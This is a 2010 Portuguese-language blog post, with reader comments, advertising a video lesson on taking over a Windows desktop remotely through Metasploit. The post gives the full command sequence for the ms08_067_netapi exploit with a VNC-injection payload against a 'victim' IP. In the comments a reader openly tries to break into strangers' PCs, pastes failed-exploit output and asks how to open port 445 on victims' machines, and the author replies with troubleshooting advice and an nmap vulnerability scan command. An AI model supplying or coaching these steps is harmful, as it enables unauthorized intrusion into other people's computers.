Remote Desktop com VNC via metasploit

Posted: 28 maio 2010 by Bhior in Marcadores: ,
9

Mostro com acessar um desktop remotamente com VNC via metasploit uma de muitas ferramentas encontradas no metasploit.

O que eu fiz?
Configurei o metasploit para injetar uma carga vncinject usando o exploit ms08_067_netapi

Comandos:

use exploit/windows/smb/ms08_067_netapi
set RHOST IP_da_vitima
set PAYLOAD windows/vncinject/bind_tc
exploit
O ambiente da aula e numa distro linux "backtrack 4", mas pode ser usando em qualquer SO que rode metasploit.

Baixar: http://www.4shared.com/file/olS5vapb/Remote_desktop_VNC.html

Assisti on line: http://blip.tv/file/3686233

9 comentários:

  1. Anônimo says:

    Iae Bhior Blz ? vey sou seu Adimiro muito voce voce é o cara!; vlw pela video aula!: CARA DIZ O NOME DA MUSICA AE ? VLW!

  1. Bhior says:

    Foi quase uma declaração :p zuando...

    Segue: http://www.4shared.com/audio/7p1etR6Z/De_role_com_nois_-__tioteD.html
    http://letras.terra.com.br/tioted/1493925/

    Abraços

  1. Anônimo says:

    oasksoaksao Vlw!;

  1. Anônimo says:

    O Bhior sou eu de novo!esse Anonimos;! oaskasok Adorei essa video aula mais tipow pra eu invadir esse PC pode ser qualquer um tipow: service Pack 3 2 1 Windows 7 qulquer um; se nao, coloca ai os tipow de S.O que pode invadir VLlllllW!!!!

  1. Anônimo says:

    Bhior sou eu de nvoo : faço tudo direitim quando xega na ultima parte quado escreve exploit; ae da isso

    [*] Started bind handler
    [-] exploit exception: the connection was refused by the remote host (xxx.xx.xx.xx)
    [-] Exploit Completed, but no session was Created

    o que pode ser ??
    vllllw!

  1. Bhior says:

    Anônimo,

    Depois de usar o modulo, digite "info" no console do meta...
    Vai te mostra toda as informações que você deseja.

    []'

  1. Anônimo says:

    Ai Bhior nao aparece nada bixo eu queria entra no pc mesmo nem aparece o nome do Pc o ip quando eu coloco "info" ajuda ae vlw!

  1. Bhior says:

    Impossivel!

    uso o exploit:

    use exploit/windows/smb/ms08_067_netapi
    info

    vai ver quais sistema o exploit afeta!

    caso ainda tenha duvido se esta vul ou não use esse script do nmap:

    nmap -v -sS --script=smb-check-vulns IP

    ele testa 4 vul no alvo.

    []'

  1. Anônimo says:

    Vlw pego o script vlw mesmo!!



    BLlz mais tem como voce fazer uma video aula de como abri a porta 445/tcp ? pq a maioria dos ip da vitima que eu tenho e tudo feichada se voce fazer vo ficr muito gratoo vlw!